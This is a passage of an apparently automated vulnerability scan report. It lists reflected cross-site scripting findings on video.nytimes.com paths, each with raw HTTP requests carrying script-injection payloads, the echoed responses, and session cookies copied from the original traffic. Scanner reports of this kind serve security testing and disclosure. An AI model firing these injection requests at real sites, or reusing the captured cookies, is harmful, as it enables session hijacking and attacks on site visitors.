Cookie: up=AB8GAb1e20SA09Nj; zFN=ABD4ABC3AB810AB0830A00803; zFD=ABD4ABC3AB810AB0830A00803; RMID=00c3216817494cddd04d311a; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616236837:ss=1289616226962; rsi_segs=H07707_10456|H07707_10493|H07707_10707|H07707_10794; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ups=ABD1gU1d20SA06nv; news_people_toolbar=NO; adxcs=-|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:19:20 GMT
Content-type: text/html
Cache-Control: private
Content-Length: 233440

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/?src=hp1-0-V&38b95"><script>alert(1)</script>9c567e08122=1">
...[SNIP]...

3.295. http://video.nytimes.com/ [src parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52977"><script>alert(1)</script>b211311428d was submitted in the src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?src=hp1-0-V52977"><script>alert(1)</script>b211311428d HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: video.nytimes.com
Proxy-Connection: Keep-Alive
Cookie: up=AB8GAb1e20SA09Nj; zFN=ABD4ABC3AB810AB0830A00803; zFD=ABD4ABC3AB810AB0830A00803; RMID=00c3216817494cddd04d311a; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616236837:ss=1289616226962; rsi_segs=H07707_10456|H07707_10493|H07707_10707|H07707_10794; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ups=ABD1gU1d20SA06nv; news_people_toolbar=NO; adxcs=-|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:19:04 GMT
Content-type: text/html
Cache-Control: private
Content-Length: 233436

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/?src=hp1-0-V52977"><script>alert(1)</script>b211311428d">
...[SNIP]...

3.296. http://video.nytimes.com/video/2010/10/15/dining/1248068993504/quick-preserved-lemons.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/10/15/dining/1248068993504/quick-preserved-lemons.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1952e"><script>alert(1)</script>8858d469260 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/10/15/dining/1248068993504/quick-preserved-lemons.html?1952e"><script>alert(1)</script>8858d469260=1 HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:18:57 GMT
Content-type: text/html
Content-Length: 249683

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/10/15/dining/1248068993504/quick-preserved-lemons.html?1952e"><script>alert(1)</script>8858d469260=1">
...[SNIP]...

3.297. http://video.nytimes.com/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33882"><script>alert(1)</script>31caca2eed2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/201033882"><script>alert(1)</script>31caca2eed2/10/21/continuous/1248069216552/timescast-october-21-2010.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:17:05 GMT
Content-type: text/html
Content-Length: 233673

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/201033882"><script>alert(1)</script>31caca2eed2/10/21/continuous/1248069216552/timescast-october-21-2010.html">
...[SNIP]...

3.298. http://video.nytimes.com/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77329"><script>alert(1)</script>7987dd68833 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/1077329"><script>alert(1)</script>7987dd68833/21/continuous/1248069216552/timescast-october-21-2010.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:17:27 GMT
Content-type: text/html
Content-Length: 233673

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/1077329"><script>alert(1)</script>7987dd68833/21/continuous/1248069216552/timescast-october-21-2010.html">
...[SNIP]...

3.299. http://video.nytimes.com/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25c4f"><script>alert(1)</script>6923e40337c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/10/2125c4f"><script>alert(1)</script>6923e40337c/continuous/1248069216552/timescast-october-21-2010.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:17:45 GMT
Content-type: text/html
Content-Length: 233673

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/10/2125c4f"><script>alert(1)</script>6923e40337c/continuous/1248069216552/timescast-october-21-2010.html">
...[SNIP]...

3.300. http://video.nytimes.com/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://video.nytimes.com
Path:	/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c66a5"%3ba06b7ba14 was submitted in the REST URL parameter 5. This input was echoed as c66a5";a06b7ba14 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /video/2010/10/21/continuousc66a5"%3ba06b7ba14/1248069216552/timescast-october-21-2010.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:18:38 GMT
Content-type: text/html
Content-Length: 226211

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="text/javascript">
var user_type = "0";
var s_prop20 = "";
var s_account = "nytimesglobal,nytcontinuousc66a5";a06b7ba14";
var dcsvid = "";
var regstatus = "non-registered";
var s_channel = "continuousc66a5";a06b7ba14";
var s_prop2 = "";
var s_prop1 = "multimedia";
</script>
...[SNIP]...

3.301. http://video.nytimes.com/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a06d3"><script>alert(1)</script>3ccfb4ead35 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/10/21/continuousa06d3"><script>alert(1)</script>3ccfb4ead35/1248069216552/timescast-october-21-2010.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:18:32 GMT
Content-type: text/html
Content-Length: 226338

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/10/21/continuousa06d3"><script>alert(1)</script>3ccfb4ead35/1248069216552/timescast-october-21-2010.html">
...[SNIP]...

3.302. http://video.nytimes.com/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://video.nytimes.com
Path:	/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d5a0'%3b2a2f1650b63 was submitted in the REST URL parameter 5. This input was echoed as 2d5a0';2a2f1650b63 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /video/2010/10/21/continuous2d5a0'%3b2a2f1650b63/1248069216552/timescast-october-21-2010.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:19:13 GMT
Content-type: text/html
Content-Length: 226221

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
sion%20with%20Tamaryn.');
}
function getShareKeywords() {
return( '' );
}
function getShareSection() {
return( 'Video%20Library' );
}
function getShareSectionDisplay() {
return( 'continuous2d5a0';2a2f1650b63' );
}
function getShareSubSection() {
return( '' );
}
function getShareByline() { //artist is specific to slide - should actually relate to entire show
return getTitleItem('auth', decodeURICom
...[SNIP]...

3.303. http://video.nytimes.com/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6809"><script>alert(1)</script>5e5ac7ec891 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html?a6809"><script>alert(1)</script>5e5ac7ec891=1 HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:15:08 GMT
Content-type: text/html
Content-Length: 226172

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html?a6809"><script>alert(1)</script>5e5ac7ec891=1">
...[SNIP]...

3.304. http://video.nytimes.com/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f213"><script>alert(1)</script>45ea0455716 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/20107f213"><script>alert(1)</script>45ea0455716/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:16:53 GMT
Content-type: text/html
Content-Length: 233658

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/20107f213"><script>alert(1)</script>45ea0455716/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html">
...[SNIP]...

3.305. http://video.nytimes.com/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca6e9"><script>alert(1)</script>52b1c451e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/10ca6e9"><script>alert(1)</script>52b1c451e/22/dining/1248068993538/ricotta-cheese-gnocchi.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:17:15 GMT
Content-type: text/html
Content-Length: 233654

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/10ca6e9"><script>alert(1)</script>52b1c451e/22/dining/1248068993538/ricotta-cheese-gnocchi.html">
...[SNIP]...

3.306. http://video.nytimes.com/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 767f2"><script>alert(1)</script>c70020ad194 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/10/22767f2"><script>alert(1)</script>c70020ad194/dining/1248068993538/ricotta-cheese-gnocchi.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
